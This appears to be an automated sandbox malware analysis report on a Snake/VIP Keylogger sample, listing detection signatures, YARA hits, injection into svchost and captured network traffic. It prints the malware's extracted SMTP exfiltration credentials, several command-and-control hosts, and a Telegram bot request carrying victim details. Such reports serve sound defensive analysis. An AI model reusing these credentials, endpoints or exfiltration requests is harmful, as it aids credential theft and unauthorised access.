Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8JVG9KELay.exe

Overview

General Information

Sample name:8JVG9KELay.exe
renamed because original name is a hash value
Original sample name:747c95576cb6f5f8b27ebb2c5d77f9db0e1d32963b077239eb9e81a0a27dee62.exe
Analysis ID:1631765
MD5:6e06385b8e29f2c4a2de4384d23c630d
SHA1:aeae8e5ba9e57d89a7a9572e91bbe65583a8c704
SHA256:747c95576cb6f5f8b27ebb2c5d77f9db0e1d32963b077239eb9e81a0a27dee62
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Binary is likely a compiled AutoIt script file
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 8JVG9KELay.exe (PID: 8404 cmdline: "C:\Users\user\Desktop\8JVG9KELay.exe" MD5: 6E06385B8E29F2C4A2DE4384D23C630D)
    • svchost.exe (PID: 8432 cmdline: "C:\Users\user\Desktop\8JVG9KELay.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "nykenyer@nykenyer.hu", "Password": "VC0wEHu9F4", "Host": "mail.nykenyer.hu", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "nykenyer@nykenyer.hu", "Password": "VC0wEHu9F4", "Host": "mail.nykenyer.hu", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1326810338.0000000000D70000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 F1 88 44 24 2B 88 44 24 2F B0 90 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Click to see the 24 entries
          SourceRuleDescriptionAuthorStrings
          0.2.8JVG9KELay.exe.d70000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 F1 88 44 24 2B 88 44 24 2F B0 90 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          1.2.svchost.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 F1 88 44 24 2B 88 44 24 2F B0 90 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          1.3.svchost.exe.346d000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.3.svchost.exe.346d000.0.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              1.3.svchost.exe.346d000.0.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                Click to see the 70 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\8JVG9KELay.exe", CommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", ParentImage: C:\Users\user\Desktop\8JVG9KELay.exe, ParentProcessId: 8404, ParentProcessName: 8JVG9KELay.exe, ProcessCommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", ProcessId: 8432, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\8JVG9KELay.exe", CommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", ParentImage: C:\Users\user\Desktop\8JVG9KELay.exe, ParentProcessId: 8404, ParentProcessName: 8JVG9KELay.exe, ProcessCommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", ProcessId: 8432, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T15:24:06.667248+010028033053Unknown Traffic192.168.2.549695104.21.80.1443TCP
                2025-03-07T15:24:09.792052+010028033053Unknown Traffic192.168.2.549697104.21.80.1443TCP
                2025-03-07T15:24:18.829974+010028033053Unknown Traffic192.168.2.549704104.21.80.1443TCP
                2025-03-07T15:24:21.873192+010028033053Unknown Traffic192.168.2.549706104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T15:24:00.890681+010028032742Potentially Bad Traffic192.168.2.549693158.101.44.24280TCP
                2025-03-07T15:24:04.328176+010028032742Potentially Bad Traffic192.168.2.549693158.101.44.24280TCP
                2025-03-07T15:24:07.328169+010028032742Potentially Bad Traffic192.168.2.549696158.101.44.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T15:24:31.633396+010018100071Potentially Bad Traffic192.168.2.549711149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 8JVG9KELay.exeAvira: detected
                Source: 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "nykenyer@nykenyer.hu", "Password": "VC0wEHu9F4", "Host": "mail.nykenyer.hu", "Port": "587"}
                Source: 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "nykenyer@nykenyer.hu", "Password": "VC0wEHu9F4", "Host": "mail.nykenyer.hu", "Port": "587", "Version": "4.4"}
                Source: 8JVG9KELay.exeVirustotal: Detection: 62%Perma Link
                Source: 8JVG9KELay.exeReversingLabs: Detection: 65%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 1.3.svchost.exe.346d000.0.raw.unpackString decryptor: nykenyer@nykenyer.hu
                Source: 1.3.svchost.exe.346d000.0.raw.unpackString decryptor: VC0wEHu9F4
                Source: 1.3.svchost.exe.346d000.0.raw.unpackString decryptor: mail.nykenyer.hu
                Source: 1.3.svchost.exe.346d000.0.raw.unpackString decryptor: lion-office@protonmail.com
                Source: 1.3.svchost.exe.346d000.0.raw.unpackString decryptor: 587
                Source: 1.3.svchost.exe.346d000.0.raw.unpackString decryptor:

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: 8JVG9KELay.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49694 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: Binary string: _.pdb source: svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: 8JVG9KELay.exe, 00000000.00000003.1314641117.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, 8JVG9KELay.exe, 00000000.00000003.1318110678.00000000036B0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 8JVG9KELay.exe, 00000000.00000003.1314641117.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, 8JVG9KELay.exe, 00000000.00000003.1318110678.00000000036B0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00844696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00844696
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0084C9C7
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084C93C FindFirstFileW,FindClose,0_2_0084C93C
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084F200
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084F35D
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084F65E
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00843A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00843A2B
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00843D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00843D4E
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084BF27
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AEAACh1_2_087AE800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AD09Ch1_2_087ACDF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AEF04h1_2_087AEC58
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_087A0040
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AF35Ch1_2_087AF0B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AFC0Ch1_2_087AF960
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AF7B4h1_2_087AF508
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087A3326h1_2_087A3254
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AD4F4h1_2_087AD248
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087ADDA4h1_2_087ADAF8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087A3326h1_2_087A2EF8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087A2954h1_2_087A26A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AD94Ch1_2_087AD6A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AE1FCh1_2_087ADF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087A0D10h1_2_087A0B30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087A16FBh1_2_087A0B30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087A3326h1_2_087A2F08
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087AE654h1_2_087AE3A8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49711 -> 149.154.167.220:443
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 158.101.44.242 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.80.1 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:32:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226546%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49696 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49695 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49697 -> 104.21.80.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49694 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008525E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008525E2
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:32:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226546%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:24:31 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
